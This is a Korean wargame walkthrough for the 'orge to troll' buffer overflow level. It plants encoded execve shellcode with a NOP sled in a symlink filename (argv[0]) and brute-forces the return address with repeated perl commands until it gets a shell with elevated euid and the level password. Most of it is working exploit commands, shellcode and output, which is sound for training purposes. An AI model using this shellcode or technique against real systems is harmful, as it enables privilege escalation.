orge to troll

이번 문제에는 전 문제에다가 인자의 개수가 2개인지 검사하는 항목이 추가 되었다.

즉,argv[2]를 이용한 공격은 할 수 없다.

 

그럼 우리가 사용할수 있는것은

 

1.sfp변조

2.ret변조

3.최대 48바이트의 argv[1] ->하지만 이것도 40바이트는 초기화 되버린다.

4.argv[0] ->파일명.

 

그럼 argv[0]을 사용해서 공격해보자.

 

파일명에다가 심볼릭 링크를 쉘코드로 걸어서 ret에다가 argv[0]의 주소를 주면 공격에 성공할꺼 같다.

 

문제가 하나 있는데 쉘코드에 '2f'가 들어가 있으면 심볼릭 링크가 걸리지 않는다. 그래서 2f가 없는 코드를 사용해야 하는데 다음의 쉘코드를 이용하면 된다.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

 

출처: <http://iyounges.org/m/post/view/id/556>

 

 

공격!

 

 

[orge@localhost orge]$ bash2

[orge@localhost orge]$ ln -s troll `perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\x

e9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\x

e2\x9a\xb1\x0c\xce\x81"'`                         //50개의 nop slide를 가진 payload로 심볼릭 링크를 생성.

[orge@localhost orge]$ ls

troll    ???????????????????????????????????????????????????^12?l????u楕?凹2핽i00tii0cjo??T????

troll.c

 

[orge@localhost orge]$ gdb -q troll_1

(gdb) b *main+317

Breakpoint 1 at 0x804863d

(gdb) r `perl -e 'print "a"x47,"\xbf"'`

Starting program: /home/orge/troll_1 `perl -e 'print "a"x47,"\xbf"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

 

풟reakpoint 1, 0x804863d in main ()

(gdb) x/4x $ebp

0xbffffcb8:     0x61616161      0xbf616161      0x00000000      0xbffffd04

(gdb) x/x 0xbffffd04

0xbffffd04:     0xbffffdfc

(gdb) x/s 0xbffffdfc

0xbffffdfc:      "/home/orge/troll_1"  //대략적인 argv[0]의 위치 확인

(gdb) quit

 

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xfc\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx涍

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xec\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx入

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xdc\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx夫

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xcc\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx桂

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xbc\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx숫

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xac\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x9c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx쒨

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x8c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx뛁

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x7c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x6c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxl?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x5c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x4c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxL?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x3c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x2c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,?

풱egmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75

\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1

\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x1c\xfd\xff\xbf"'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?

풺ash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ my-pass

euid = 508

aspirin

 

 

//이번공격은 argv[0]의 위치가 맞추기 어려워 여러 번 시도 끝에 성공하였다.